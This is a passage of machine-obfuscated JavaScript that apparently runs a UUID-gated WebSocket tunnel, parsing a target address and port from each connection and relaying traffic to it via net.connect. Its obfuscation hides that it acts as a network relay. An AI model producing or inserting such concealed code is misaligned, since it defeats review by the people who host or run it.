_0x213bca(_0x433001-0x78,_0x317a3f- -0x4da,_0x317a3f-0x16a,_0x5c6180,_0x5c6180-0xee);}return _0x1c21f8[_0x26bc63(-0xde,-0x139,-0x4a,0x33,-0xa4)](_0x4f6420,_0x3470f7);},'IGTuh':function(_0x39e827,_0x288a81){function _0x363714(_0x1014a3,_0x42303a,_0x2335b8,_0x3bc845,_0x360e7f){return _0x29d5f9(_0x2335b8- -0x3db,_0x42303a-0x135,_0x2335b8-0x1b8,_0x1014a3,_0x360e7f-0x16e);}return _0x1c21f8[_0x363714(-0x146,-0x1c3,-0x1f5,-0x271,-0x156)](_0x39e827,_0x288a81);},'NLVqL':function(_0x39be05,_0x356769){function _0x3c96ea(_0x1348fb,_0x20fd17,_0x1d89e3,_0x40098e,_0xb5dac4){return _0x5ec539(_0x1d89e3-0x33,_0xb5dac4,_0x1d89e3-0x73,_0x40098e-0x1e9,_0xb5dac4-0xe3);}return _0x1c21f8[_0x3c96ea(0xe,-0xfc,-0x95,-0xd1,-0x28)](_0x39be05,_0x356769);},'fofzi':function(_0x3cc423,_0x3786db){function 
_0x369d35(_0x1379ad,_0x52aaa2,_0x5e4c0b,_0x39aad5,_0x1c563b){return _0x270b17(_0x1379ad-0xd6,_0x1c563b- -0x3a1,_0x5e4c0b-0xb0,_0x39aad5-0xe9,_0x1379ad);}return _0x1c21f8[_0x369d35(0x6d,-0x78,-0xfc,-0x122,-0x76)](_0x3cc423,_0x3786db);},'QmRQu':function(_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e){function _0x2b9cad(_0x3a8b36,_0x5f5aaa,_0x50e1cf,_0x305157,_0x4f0d4e){return _0x270b17(_0x3a8b36-0x3f,_0x50e1cf- -0x352,_0x50e1cf-0x82,_0x305157-0x10e,_0x3a8b36);}return _0x1c21f8[_0x2b9cad(-0x23e,-0x1fc,-0x1d8,-0x2bb,-0x2c4)](_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e);},'GwelD':_0x1c21f8[_0x7dbfd5(0x40f,0x4b8,0x495,0x3bd,0x429)],'tamNE':function(_0x9cc4ff,_0x3b60d4,_0x3b647e){function _0x5061c8(_0x4cecf0,_0x5a8a4a,_0x3060f3,_0x59c5cc,_0x35c7aa){return _0x213bca(_0x4cecf0-0x180,_0x3060f3- -0x5e8,_0x3060f3-0xe8,_0x59c5cc,_0x35c7aa-0x2b);}return _0x1c21f8[_0x5061c8(-0xa2,-0xac,-0xf0,-0xc1,-0xe7)](_0x9cc4ff,_0x3b60d4,_0x3b647e);},'rvbRb':_0x1c21f8[_0x7dbfd5(0x4df,0x54d,0x3f8,0x568,0x499)]};_0x5a5af8[_0x7dbfd5(0x275,0x311,0x272,0x431,0x363)](_0x1c21f8[_0x5ec539(-0x165,-0x95,-0xd7,-0x82,-0xe2)]),_0x138eef[_0x7dbfd5(0x40c,0x2bc,0x24f,0x29d,0x335)](_0x1c21f8[_0x29d5f9(0x1de,0xf0,0x132,0x17d,0x259)],_0x455e6d=>{const _0x40bda3={'mODJA':_0x4a3fcb[_0x3b30db(0x225,0x1ed,0x1de,0x1ed,0x167)],'baqfC':function(_0x2c057e,_0x47734d){function _0x116e99(_0x55554a,_0x8683c7,_0x55db72,_0x251edd,_0x11b849){return _0x3b30db(_0x11b849- -0x128,_0x8683c7-0x56,_0x8683c7,_0x251edd-0x3,_0x11b849-0x43);}return _0x4a3fcb[_0x116e99(0x106,0xda,0xa6,-0x3c,0x50)](_0x2c057e,_0x47734d);},'tsKtZ':_0x4a3fcb[_0x3b30db(0x2a6,0x36c,0x278,0x20d,0x234)],'QtdjG':function(_0x30cacf,_0x890783){function _0x4a95a8(_0x2d26cd,_0x58b1f1,_0x38a957,_0x4ff900,_0x116f39){return _0x3b30db(_0x58b1f1- -0x11d,_0x58b1f1-0x66,_0x4ff900,_0x4ff900-0xd1,_0x116f39-0x1a7);}return _0x4a3fcb[_0x4a95a8(-0xea,-0x6,0x8c,0x48,0xd3)](_0x30cacf,_0x890783);},'KbQMx':_0x4a3fcb[_0x583d07(0x1a,-0xd3,-0x65,-0x15d,-0xbf)]};function _0x207e22(_0x13fdb1,_0x4bdc41,_0x3dbead,_0x3235d2,_0x22b63d){return _0x7dbfd5(_0x3235d2,_0x4bdc41-0x115,_0x3dbead-0x2a,_0x3235d2-0xb1,_0x4bdc41- -0x5ec);}const [_0x494a4f]=_0x455e6d,_0x13646c=_0x455e6d[_0x3b30db(0x1f2,0x2c9,0x160,0x2c2,0x17c)](0x2*-0xa66+-0x1de9+0x32b6,-0x24d1+-0x7dd+0x2cbf);if(!_0x13646c[_0x207e22(-0x287,-0x22a,-0x1af,-0x2d3,-0x15b)]((_0x9d9ec0,_0x2f8e48)=>_0x9d9ec0==_0x5b146a(_0x39e3b7[_0x2146f8(-0x2ec,-0x2b2,-0x31c,-0x263,-0x2df)+'r'](_0x2f8e48*(0x1*0xb65+-0x29f*-0xc+-0x1*0x2ad7),0x1e30+0x11*0x3d+-0x223b),0x10b8+-0x2*-0x6d7+0x1e56*-0x1)))return;let _0x1d6e36=_0x4a3fcb[_0xcca952(0x483,0x450,0x441,0x423,0x4b2)](_0x455e6d[_0xcca952(0x53d,0x4be,0x580,0x4cb,0x44c)](-0x2508+0x1*0x18cc+0xc4d,-0x204*-0x10+-0x239a+0x36c)[_0x583d07(-0xab,0x1d,0xb,-0x170,-0xb7)+_0x3b30db(0x17a,0xb4,0x202,0x21f,0x1fa)](),0x61*-0x59+-0x904*-0x1+0x18c8);const 
_0x4f52ed=_0x455e6d[_0x583d07(-0x14d,-0x35,-0xbf,-0xc0,-0x63)](_0x1d6e36,_0x1d6e36+=-0x120f+-0x41*-0x86+-0xff5)[_0x3b30db(0x19e,0x194,0x189,0x1a6,0x10d)+_0x3b30db(0x28a,0x1ca,0x215,0x352,0x1ba)+'BE'](0xfe*-0x3+0x22d+0xcd),_0x3fb1c5=_0x455e6d[_0xcca952(0x577,0x4be,0x405,0x43e,0x487)](_0x1d6e36,_0x1d6e36+=-0x18e3+-0x66d*0x1+0x1f51)[_0x3b30db(0x19e,0x14f,0x1bf,0x1d8,0x1c8)+_0x2146f8(-0x237,-0x203,-0x233,-0x22b,-0x2a8)](),_0x5b52f1=_0x4a3fcb[_0x207e22(-0x12e,-0x164,-0xdc,-0x193,-0x85)](_0x3fb1c5,0x3b2*-0x2+0x2275*-0x1+0x1e7*0x16)?_0x455e6d[_0x207e22(-0x218,-0x1e1,-0x29b,-0x230,-0x119)](_0x1d6e36,_0x1d6e36+=-0x158d+-0x1a07*-0x1+-0x476)[_0xcca952(0x62f,0x552,0x628,0x4cb,0x476)]('.'):_0x4a3fcb[_0x2146f8(-0x22c,-0x33b,-0x2ea,-0x276,-0x2ee)](_0x3fb1c5,0x22d*-0x2+-0xbb7+-0x1013*-0x1)?new _0x2486f9()[_0x3b30db(0x21f,0x15c,0x232,0x2b4,0x272)+'e'](_0x455e6d[_0xcca952(0x4aa,0x4be,0x427,0x4c2,0x419)](_0x4a3fcb[_0x2146f8(-0x260,-0x38b,-0x2a8,-0x2a9,-0x2a9)](_0x1d6e36,-0x13*-0xa+-0x13ae+0x12f1),_0x1d6e36+=_0x4a3fcb[_0x583d07(-0x70,-0x109,-0x17b,-0x5a,-0xe7)](0x207e*0x1+-0x2046+-0x1*0x37,_0x455e6d[_0xcca952(0x421,0x4be,0x4c2,0x534,0x41d)](_0x1d6e36,_0x4a3fcb[_0x2146f8(-0x2c4,-0x2e3,-0x1b0,-0x1d3,-0x1ff)](_0x1d6e36,-0xc11+0x12*-0x7+-0x18*-0x86))[_0x2146f8(-0x2a6,-0x1ff,-0x254,-0x368,-0x284)+_0x583d07(-0xe7,-0x23,-0x1f,-0xca,-0xdb)]()))):_0x4a3fcb[_0x2146f8(-0x206,-0x1bd,-0x2b1,-0x2c1,-0x22e)](_0x3fb1c5,0x14ed+-0x2502+0x1018)?_0x455e6d[_0x207e22(-0x198,-0x1e1,-0x102,-0x225,-0x2ad)](_0x1d6e36,_0x1d6e36+=-0xca7+0x125b*0x1+-0x5a4)[_0xcca952(0x3ad,0x49d,0x4af,0x4bb,0x4fc)+'e']((_0x4e2bb2,_0x3c8268,_0x4ecfb3,_0x1b3c70)=>_0x4ecfb3%(0x1981+0x1162+-0x1*0x2ae1)?_0x4e2bb2[_0x2146f8(-0x2d5,-0x318,-0x37d,-0x33a,-0x2fa)+'t'](_0x1b3c70[_0xcca952(0x56c,0x4be,0x569,0x48c,0x54b)](_0x4ecfb3-(-0x65*0x37+0x3ce+0x11e6),_0x4ecfb3+(-0x3*-0x506+-0x1ae4+0xbd3))):_0x4e2bb2,[])[_0x583d07(-0x94,-0x59,-0x4b,-0x33,-0x96)](_0x4ce2d5=>_0x4ce2d5[_0xcca952(0x529,0x46a,0x49a,0x4f4,0x4cd)+_0x583d07(-0xae,0x111,0x8d,0x70,0x35)+'BE'](-0x4d*-0x22+-0x270*0x10+0x1cc6)[_0x583d07(-0x9,0x93,0xe4,0x61,0x7b)+_0x583d07(-0x11a,-0x57,-0xc0,-0x54,-0x124)](0x6e6*0x1+-0x1d66+0x1690))[_0x3b30db(0x286,0x22e,0x209,0x220,0x289)](':'):'';_0x4a3fcb[_0x583d07(-0xd1,-0xb,-0xfe,-0x111,-0x2f)](_0x1f0967,_0x4a3fcb[_0x3b30db(0x2c6,0x2c3,0x252,0x33a,0x395)],_0x5b52f1,_0x4f52ed);function _0x2146f8(_0x1d4b5b,_0x2f588e,_0x20ba08,_0xa0c5,_0x152e14){return _0x29d5f9(_0x152e14- -0x450,_0x2f588e-0x10b,_0x20ba08-0x95,_0x1d4b5b,_0x152e14-0x14);}_0x2e49a9[_0x3b30db(0x189,0x1a1,0x136,0xcf,0x13f)](new _0x5b208c([_0x494a4f,-0x3f5+0x218b+-0x1d96]));const _0x547ab0=_0x4a3fcb[_0x583d07(-0x41,0xd,-0x19d,-0x15a,-0xdd)](_0x1171a1,_0x4b5aa3),_0x362371={};function _0x583d07(_0x175522,_0x401356,_0x1df422,_0x46d992,_0xa03659){return _0x270b17(_0x175522-0xbf,_0xa03659- -0x2bb,_0x1df422-0x63,_0x46d992-0x173,_0x1df422);}function _0x3b30db(_0x1e0d37,_0x562ef0,_0x564c4b,_0x5872c0,_0x450259){return _0x213bca(_0x1e0d37-0x11b,_0x1e0d37- -0x2d8,_0x564c4b-0x9f,_0x564c4b,_0x450259-0x1bd);}_0x362371[_0x3b30db(0x2f0,0x36d,0x312,0x29d,0x3ad)]=_0x5b52f1,_0x362371[_0x583d07(-0x139,-0x1b5,-0xf4,-0x1d6,-0x146)]=_0x4f52ed;const _0xb54f8b={};_0xb54f8b[_0xcca952(0x662,0x5bc,0x5a9,0x500,0x682)]=_0x5b52f1,_0xb54f8b[_0x583d07(-0x14e,-0x198,-0x237,-0xa9,-0x146)]=_0x4f52ed;function _0xcca952(_0x3a9eda,_0x1dbf6f,_0x49fc7d,_0x419bce,_0x17225b){return _0x7dbfd5(_0x419bce,_0x1dbf6f-0x1c,_0x49fc7d-0x15e,_0x419bce-0x1f0,_0x1dbf6f-0xb3);}_0x438959[_0x583d07(-0x1f,-0x15b,-0x55,-0x5c,-0xde)+'ct'](_0x362371,function(){function 
_0x23d9a3(_0x1b9028,_0x308619,_0x45a73e,_0x4996e2,_0x5845fb){return _0x3b30db(_0x1b9028-0x277,_0x308619-0xa3,_0x5845fb,_0x4996e2-0x1bd,_0x5845fb-0xcc);}function _0x687019(_0x5252d6,_0x57cac2,_0x3bdeed,_0x2fd398,_0x5c6fe8){return _0x2146f8(_0x5c6fe8,_0x57cac2-0x123,_0x3bdeed-0xe0,_0x2fd398-0x37,_0x5252d6-0x3dc);}this[_0x1e5482(-0xeb,-0x11f,-0x1bc,-0x136,-0xd4)](_0x455e6d[_0x9c6c20(-0x5b,-0xbc,0x8,0x6,-0x2e)](_0x1d6e36));function _0x9c6c20(_0x23b2d2,_0x2d98d3,_0x907baa,_0x1649d3,_0x52b7e8){return _0x207e22(_0x23b2d2-0x147,_0x23b2d2-0x186,_0x907baa-0xf2,_0x1649d3,_0x52b7e8-0x10c);}function _0x1e5482(_0x35f990,_0x4ef2b0,_0x3086c4,_0x274cc2,_0x84226d){return _0x2146f8(_0x3086c4,_0x4ef2b0-0xf5,_0x3086c4-0x161,_0x274cc2-0x7e,_0x35f990-0x1b1);}function _0x3c5723(_0x533307,_0x4c9964,_0x403242,_0xe92fc,_0x16addf){return _0x207e22(_0x533307-0x157,_0x16addf-0x701,_0x403242-0x71,_0x403242,_0x16addf-0x14b);}_0x547ab0['on'](_0x40bda3[_0x3c5723(0x4f1,0x52b,0x567,0x613,0x5b6)],_0x40bda3[_0x3c5723(0x53b,0x548,0x4fa,0x4c2,0x51a)](_0xb94e54,_0x40bda3[_0x3c5723(0x45d,0x493,0x3db,0x3fe,0x483)]))[_0x3c5723(0x4e7,0x5d5,0x5d8,0x4ce,0x592)](this)['on'](_0x40bda3[_0x9c6c20(0x3b,0xc0,0x11c,0xeb,0x107)],_0x40bda3[_0x1e5482(0x66,0x101,-0x2e,0x148,0x13b)](_0x174e2d,_0x40bda3[_0x687019(0x1a8,0x181,0x134,0x133,0x283)]))[_0x3c5723(0x63f,0x5fb,0x649,0x595,0x592)](_0x547ab0);})['on'](_0x4a3fcb[_0x3b30db(0x225,0x168,0x28a,0x238,0x1c3)],_0x4a3fcb[_0x3b30db(0x1fd,0x271,0x2d3,0x173,0x179)](_0x32b88e,_0x4a3fcb[_0x2146f8(-0xb1,-0x1dc,-0x1a5,-0x101,-0x144)],_0xb54f8b));})['on'](_0x1c21f8[_0x29d5f9(0x260,0x2e3,0x2c0,0x20e,0x2c4)],_0x1c21f8[_0x29d5f9(0x1b1,0x120,0x23b,0x1bd,0x1ed)](_0x4fa98d,_0x1c21f8[_0x5ec539(-0x10c,-0x1df,-0xfa,-0xff,-0x184)]));}}});httpServer[_0x5b3717(-0x1f7,-0x269,-0x202,-0x1a0,-0x1f1)+'n'](port,()=>{function _0x4f73e5(_0x26d7ed,_0x444357,_0x2a7a97,_0x527e1e,_0x28490c){return _0x3b9f4f(_0x2a7a97- -0x167,_0x444357-0x97,_0x2a7a97-0x97,_0x527e1e-0x66,_0x444357);}function _0x54079d(_0x4f622f,_0x7f5321,_0x4099a1,_0x2c58be,_0x2ef5aa){return _0x3b9f4f(_0x4099a1- -0x2db,_0x7f5321-0x6b,_0x4099a1-0xe5,_0x2c58be-0x19f,_0x2ef5aa);}function _0x26639a(_0x5d3d7e,_0x29c4ad,_0x178272,_0x4b442a,_0x26f109){return _0x504eae(_0x26f109- -0x452,_0x29c4ad-0x4a,_0x178272-0xc7,_0x4b442a-0x1ba,_0x29c4ad);}function _0x5aa48e(_0x1cf985,_0x4471c3,_0xd8689d,_0xfd7aee,_0x3b6576){return _0x1e3602(_0x1cf985-0x20,_0xd8689d,_0xd8689d-0x87,_0x3b6576-0x200,_0x3b6576-0x2e);}function _0x193839(_0x5bc765,_0x4179c0,_0x453ecf,_0x550361,_0x533d70){return _0x5b3717(_0x550361-0x445,_0x453ecf,_0x453ecf-0xe5,_0x550361-0x10f,_0x533d70-0x66);}console[_0x5aa48e(0x1e1,0x76,0x1cf,0x98,0x162)](_0x54079d(-0x366,-0x264,-0x306,-0x2de,-0x242)+_0x5aa48e(0x1d7,0x228,0xd5,0x19e,0x17b)+_0x54079d(-0x267,-0x2c6,-0x200,-0x2e4,-0x140)+_0x5aa48e(0x1ae,0x22a,0x26e,0x281,0x246)+_0x26639a(-0x142,-0x1fc,-0x8a,-0xce,-0x147)+'\x20'+port);});const _0x58453d={};_0x58453d[_0x5b3717(-0x251,-0x1d1,-0x218,-0x227,-0x168)+'r']=httpServer;const wss=new WebSocket[(_0x504eae(0x258,0x1f3,0x339,0x329,0x2d8))+'r'](_0x58453d);wss['on'](_0x1e3602(-0x120,-0xfb,-0xa7,-0x71,0x27)+_0x1e3602(-0x2a,0x75,-0x17,0xb1,0x91),_0x338277=>{const _0x15e773={'peSlp':function(_0x196ade,_0x291a3c){return _0x196ade===_0x291a3c;},'Mlvef':_0x53ba12(0x112,0xd2,-0xc,0xd7,-0x15),'qvIbA':_0x53ba12(0x205,0x21b,0x173,0x2ba,0x208),'rLUYi':_0x22caf1(-0x84,0x9f,-0x18,0x55,0x9),'iKskN':function(_0x5aec02,_0x4a41f9){return 
_0x5aec02(_0x4a41f9);},'CyOYO':_0x48965c(0x499,0x49f,0x468,0x3cd,0x531),'vjNvL':function(_0x498de0,_0x1ab857){return _0x498de0(_0x1ab857);},'mAhaX':_0x53ba12(0xfa,0x117,0x50,0x170,0xc4),'wmrKJ':function(_0x97afe7,_0x5596f4){return _0x97afe7+_0x5596f4;},'UzLYU':function(_0x4079ce,_0x7de1){return _0x4079ce+_0x7de1;},'xggyp':_0x22caf1(-0x42,-0x1c,-0xc1,-0xad,-0x9)+_0x48965c(0x3f1,0x4dd,0x47b,0x4e3,0x465)+_0x4d9560(-0x1d9,-0x13d,-0x153,-0x155,-0x1b7)+_0x48965c(0x47c,0x394,0x442,0x330,0x457),'gtuvb':_0x4e9ec3(0x1be,0x16d,0x1e5,0x207,0x16a)+_0x4d9560(0x55,-0x4a,0xa,-0x5c,-0x2c)+_0x53ba12(0x60,0xd7,0xe7,0xf7,0x2e)+_0x4d9560(-0x107,0x8,-0xa3,-0x23,0x45)+_0x4e9ec3(0xd2,0xa7,0xd9,0x42,0x1af)+_0x48965c(0x49d,0x423,0x338,0x3d0,0x493)+'\x20)','nJwcJ':function(_0x34f70e,_0x420df2){return _0x34f70e!==_0x420df2;},'myeAR':_0x48965c(0x403,0x3a4,0x42b,0x448,0x3ec),'NHqXG':_0x53ba12(0x17f,0xc4,0x168,0xbf,0x14f),'HIzaX':function(_0x2c0d5a,_0x303dde){return _0x2c0d5a==_0x303dde;},'LFXJW':function(_0x5ba431,_0x230a43){return _0x5ba431+_0x230a43;},'pWOqq':function(_0x590dcb,_0x52c607){return _0x590dcb+_0x52c607;},'IdbFC':function(_0xc482c0,_0x8fba09,_0x230c0a,_0xb4b844){return _0xc482c0(_0x8fba09,_0x230c0a,_0xb4b844);},'kdWLe':_0x53ba12(0xea,0xa7,0x3b,0x156,0x9b)+_0x48965c(0x530,0x494,0x3ff,0x52b,0x4bb),'AMPQa':function(_0x4366c0,_0x220619){return _0x4366c0(_0x220619);},'wzZPT':function(_0x39f8aa,_0x4d22b1,_0x21d564){return _0x39f8aa(_0x4d22b1,_0x21d564);},'Eezyv':_0x4d9560(-0xaf,-0xd9,-0x83,-0x145,-0xb0)+_0x4e9ec3(0x22c,0x2ba,0x1d5,0x15f,0x1ca)+'r:','AJXkM':_0x53ba12(0x51,0xa7,0x32,0x37,-0x42)+_0x4d9560(-0x10c,-0x13e,-0xd4,-0x7e,-0x114)+_0x4d9560(0x1d,0xda,0x76,0x32,-0x6c)+_0x53ba12(0x15e,0xfd,0x17e,0x94,0x12d)+'ly','sxRLl':_0x53ba12(0x4f,0xf9,0x1bd,0x1ac,0x1e0)+'ge','zbVyN':_0x4e9ec3(0x157,0x254,0x23f,0x220,0x296)+_0x4e9ec3(0xf5,-0x10,0xcc,0xb9,0x71)+_0x53ba12(0x194,0x1e6,0x24e,0x25e,0x1ef)+':'};function _0x22caf1(_0x42eeed,_0x2bf72e,_0x1c7313,_0x3fae0b,_0x414167){return _0x3b9f4f(_0x414167-0x62,_0x2bf72e-0xe2,_0x1c7313-0xd6,_0x3fae0b-0x101,_0x3fae0b);}function _0x4d9560(_0x32560f,_0x19d1a5,_0x592c2c,_0x361ab5,_0x4eeedf){return _0x1d31e6(_0x361ab5- -0x203,_0x19d1a5-0x8e,_0x32560f,_0x361ab5-0x141,_0x4eeedf-0x157);}console[_0x48965c(0x3bb,0x372,0x3d8,0x3fb,0x350)](_0x15e773[_0x4d9560(-0x202,-0x134,-0x1cc,-0x1a0,-0x138)]);function _0x48965c(_0x29af8a,_0x4fff4b,_0x5ea167,_0x2a0838,_0x1e857d){return _0x3b9f4f(_0x4fff4b-0x3b7,_0x4fff4b-0x61,_0x5ea167-0xde,_0x2a0838-0x1d,_0x2a0838);}function _0x4e9ec3(_0x21b174,_0xd6c6ab,_0x2c9692,_0xbf63,_0x48d11a){return _0x5b3717(_0x2c9692-0x345,_0xbf63,_0x2c9692-0x16a,_0xbf63-0xb8,_0x48d11a-0x1b);}function _0x53ba12(_0x38030d,_0x20c24f,_0x3aba8b,_0xd84a7e,_0x101c14){return _0x504eae(_0x20c24f- -0x1c2,_0x20c24f-0x1ea,_0x3aba8b-0x14c,_0xd84a7e-0x1e4,_0x101c14);}_0x338277[_0x48965c(0x346,0x344,0x361,0x3f1,0x358)](_0x15e773[_0x53ba12(0x170,0x153,0x98,0x10f,0x176)],_0x582f00=>{function _0x1f0c5b(_0x36fad2,_0x3a1821,_0x49fb9a,_0x37f73e,_0xf00117){return _0x4d9560(_0x49fb9a,_0x3a1821-0x42,_0x49fb9a-0xfa,_0x36fad2-0xa7,_0xf00117-0x52);}function _0x41d87d(_0x38e8ac,_0x11e0f9,_0x1a5c0f,_0x46d3c6,_0x40e158){return _0x4e9ec3(_0x38e8ac-0x118,_0x11e0f9-0xdc,_0x11e0f9- -0xec,_0x46d3c6,_0x40e158-0xee);}function _0x5a4020(_0xd2a491,_0x3ce8a9,_0x5f0598,_0x5d80fe,_0x24753d){return _0x22caf1(_0xd2a491-0x76,_0x3ce8a9-0x146,_0x5f0598-0x2d,_0x5d80fe,_0x3ce8a9- -0x140);}function _0x4f1aaa(_0x51b05a,_0x50d8e8,_0x4eb23f,_0x12ebfa,_0xf53023){return _0x4e9ec3(_0x51b05a-0x16a,_0x50d8e8-0x59,_0xf53023- 
-0x345,_0x51b05a,_0xf53023-0x14d);}function _0x3d5022(_0x12afd0,_0x4b1a36,_0x47c467,_0x2ec865,_0x304c24){return _0x4e9ec3(_0x12afd0-0xc6,_0x4b1a36-0x192,_0x4b1a36-0x125,_0x304c24,_0x304c24-0x17f);}if(_0x15e773[_0x41d87d(0x15f,0xda,0x121,0xdc,0xd6)](_0x15e773[_0x3d5022(0x330,0x2f5,0x33c,0x299,0x344)],_0x15e773[_0x4f1aaa(-0x1d1,-0xf2,-0x19,-0x15,-0xf0)])){const [_0x4e2b08]=_0x582f00,_0x1b95e7=_0x582f00[_0x3d5022(0x257,0x281,0x216,0x1ff,0x251)](-0xf66+0x476*-0x7+0x2ea1,-0x1*-0x150a+0x1*-0x257d+0x1c*0x97);if(!_0x1b95e7[_0x41d87d(0x9e,0x27,0xda,-0x69,0x41)]((_0x18b0ee,_0x5ba6eb)=>_0x18b0ee==parseInt(uuid[_0x41d87d(0x42,-0x3f,0x1,-0x2d,-0xad)+'r'](_0x5ba6eb*(0x14d*-0x1+-0x38b*0x8+-0x1*-0x1da7),-0x175d*-0x1+-0x5*-0x597+-0x334e),-0x1*-0x1df5+0x793+0x368*-0xb)))return;let _0x2499f9=_0x15e773[_0x41d87d(-0xd,0xd1,0xd3,0xb1,0x4d)](_0x582f00[_0x3d5022(0x22c,0x281,0x2c8,0x332,0x236)](0x11*-0x71+-0x2e*-0x6a+0x1a*-0x71,0x1300+0xb33+-0x1e21)[_0x41d87d(-0x9c,0x1c,-0x5c,-0x30,0xce)+_0x41d87d(-0x98,-0x8,-0x18,-0x64,-0xf9)](),-0x13b2+0x5*-0x6fb+-0x2*-0x1b56);const _0x169107=_0x582f00[_0x4f1aaa(-0x20a,-0x161,-0x201,-0x267,-0x1e9)](_0x2499f9,_0x2499f9+=-0x16b*0x10+0x1006+0x6ac)[_0x1f0c5b(-0x75,-0x2a,-0x14f,0x72,-0x11f)+_0x5a4020(-0xce,0x1d,0xc4,-0x55,0x54)+'BE'](-0x1*-0x193a+0x4a*0x26+-0x2436),_0x26909=_0x582f00[_0x41d87d(-0x45,0x70,0x2c,-0x28,-0x4b)](_0x2499f9,_0x2499f9+=0x1f*-0x46+0x2408+-0x1b8d)[_0x41d87d(0x56,0x1c,-0x5a,-0xa5,-0xa3)+_0x41d87d(0x4c,-0x8,-0x98,-0xc9,-0x9a)](),_0x2df56b=_0x15e773[_0x5a4020(-0x6d,-0x9d,0x17,-0x145,0xe)](_0x26909,-0x266*0xb+-0x2241+0x3ca4)?_0x582f00[_0x5a4020(0x59,-0x7b,-0x112,-0x138,-0xcf)](_0x2499f9,_0x2499f9+=-0x269e+0x2559+-0x149*-0x1)[_0x41d87d(0x2d,0x104,0x146,0x1da,0xf5)]('.'):_0x15e773[_0x3d5022(0x2b4,0x25f,0x2cd,0x30c,0x1d6)](_0x26909,-0x1*0x9b1+-0x26d*-0x6+0x1*-0x4db)?new TextDecoder()[_0x3d5022(0x26b,0x2ae,0x247,0x33d,0x2d1)+'e'](_0x582f00[_0x1f0c5b(-0x21,0x83,-0xc0,0x7e,-0x25)](_0x15e773[_0x3d5022(0x351,0x2e2,0x234,0x2f6,0x278)](_0x2499f9,0x1*0x349+0x37f*-0x7+-0x1531*-0x1),_0x2499f9+=_0x15e773[_0x4f1aaa(-0x1c8,-0x155,-0x277,-0x21c,-0x1db)](0x1e5*-0xd+-0x2*0x136c+0x3f7a,_0x582f00[_0x1f0c5b(-0x21,0xaf,-0x77,-0x93,0xca)](_0x2499f9,_0x15e773[_0x4f1aaa(-0x317,-0x1ca,-0x218,-0x2e7,-0x24d)](_0x2499f9,-0x8b1+-0x197d+-0xb65*-0x3))[_0x4f1aaa(-0x1a5,-0x185,-0x17a,-0x16a,-0x23d)+_0x41d87d(0xbf,-0x8,0xc3,0x39,0x22)]()))):_0x15e773[_0x3d5022(0x2a0,0x25f,0x33d,0x25d,0x350)](_0x26909,-0x653*0x5+-0x26f9+0x469b)?_0x582f00[_0x41d87d(0xe7,0x70,0xec,0x1a,-0x46)](_0x2499f9,_0x2499f9+=-0x2*0x375+-0x71*-0x7+-0x1*-0x3e3)[_0x5a4020(0x33,-0x9c,-0x17d,-0x2d,-0x3d)+'e']((_0x316879,_0x3ec672,_0xfe2286,_0x40ee93)=>_0xfe2286%(0x10d*-0xe+-0x11c1+0x2079)?_0x316879[_0x3d5022(0xfc,0x1b7,0x1bf,0x272,0x231)+'t'](_0x40ee93[_0x5a4020(-0x156,-0x7b,0x4f,-0x3e,-0x62)](_0xfe2286-(0x91d*0x1+0xcf*-0xd+0x167),_0xfe2286+(-0x209a*0x1+-0x1323+0x19df*0x2))):_0x316879,[])[_0x1f0c5b(-0x54,-0x108,-0xbe,0x1a,-0x5b)](_0x427ae0=>_0x427ae0[_0x3d5022(0x2b5,0x22d,0x16f,0x26c,0x1ab)+_0x41d87d(0x167,0x108,0xf2,0x4a,0x1be)+'BE'](-0x1*-0x1e9e+-0x60e+-0x1890)[_0x1f0c5b(0xbd,0x119,0x114,0xe8,-0xc)+_0x5a4020(-0x185,-0x13c,-0x191,-0x5d,-0x180)](0x1c2e+0x1d05+0x3923*-0x1))[_0x1f0c5b(0x73,0x6e,-0x15,0x7a,0x122)](':'):'';_0x15e773[_0x4f1aaa(-0x1c0,-0x288,-0x30e,-0x2e6,-0x227)](logcb,_0x15e773[_0x41d87d(0x6b,0x154,0x196,0xe6,0xd9)],_0x2df56b,_0x169107),_0x338277[_0x1f0c5b(-0x8a,-0x3f,-0x127,-0x7a,-0xe7)](new Uint8Array([_0x4e2b08,0x138e*-0x1+0x1e8a*-0x1+-0x1*-0x3218]));const 
_0x472178=_0x15e773[_0x4f1aaa(-0x20d,-0x148,-0x1c8,-0x9b,-0x121)](createWebSocketStream,_0x338277),_0x454610={};_0x454610[_0x1f0c5b(0xdd,0x110,0x23,0x1b,0xab)]=_0x2df56b,_0x454610[_0x3d5022(0x21c,0x19e,0x252,0x14a,0x166)]=_0x169107;const _0x33faab={};_0x33faab[_0x1f0c5b(0xdd,0x10f,0x1bd,0x1a,0x17e)]=_0x2df56b,_0x33faab[_0x1f0c5b(-0x104,-0x32,-0x36,-0x7a,-0x1bf)]=_0x169107,net[_0x5a4020(-0xa0,-0xf6,-0x14e,-0xa7,-0x1d0)+'ct'](_0x454610,function(){function _0x11e0a3(_0x236c71,_0x4a6a48,_0x1ef5e0,_0x32d975,_0x11aa54){return _0x41d87d(_0x236c71-0x189,_0x4a6a48-0xce,_0x1ef5e0-0x4d,_0x32d975,_0x11aa54-0x3b);}function _0x32a8b5(_0x3e6379,_0x1c981a,_0x18be16,_0x203f9f,_0x1c008){return _0x1f0c5b(_0x1c008-0x168,_0x1c981a-0x137,_0x18be16,_0x203f9f-0x197,_0x1c008-0xd7);}function _0x16e631(_0x4993a4,_0x343edb,_0x2f90df,_0x1e6444,_0x335e7a){return _0x4f1aaa(_0x335e7a,_0x343edb-0x55,_0x2f90df-0x190,_0x1e6444-0x110,_0x2f90df- -0x29);}function _0x1098ae(_0xb69a5a,_0x1ae799,_0x2ff761,_0x287b23,_0x159c1e){return _0x1f0c5b(_0x1ae799-0x289,_0x1ae799-0xe3,_0x2ff761,_0x287b23-0x11e,_0x159c1e-0x1ce);}function _0x1f8911(_0x401cfd,_0x299939,_0x88c271,_0x6d7be,_0x18e21c){return _0x41d87d(_0x401cfd-0x161,_0x299939-0x36c,_0x88c271-0x3a,_0x18e21c,_0x18e21c-0x89);}if(_0x15e773[_0x32a8b5(0x14c,0x161,0x97,0x185,0xa8)](_0x15e773[_0x32a8b5(0x2db,0x299,0x2e4,0x322,0x23d)],_0x15e773[_0x11e0a3(0x262,0x1a0,0x1f6,0x1e3,0x23f)])){if(_0x524eef){const _0x4f6fde=_0x2d6d32[_0x1098ae(0x246,0x2ff,0x394,0x397,0x39c)](_0x56dd80,arguments);return _0xb21abe=null,_0x4f6fde;}}else 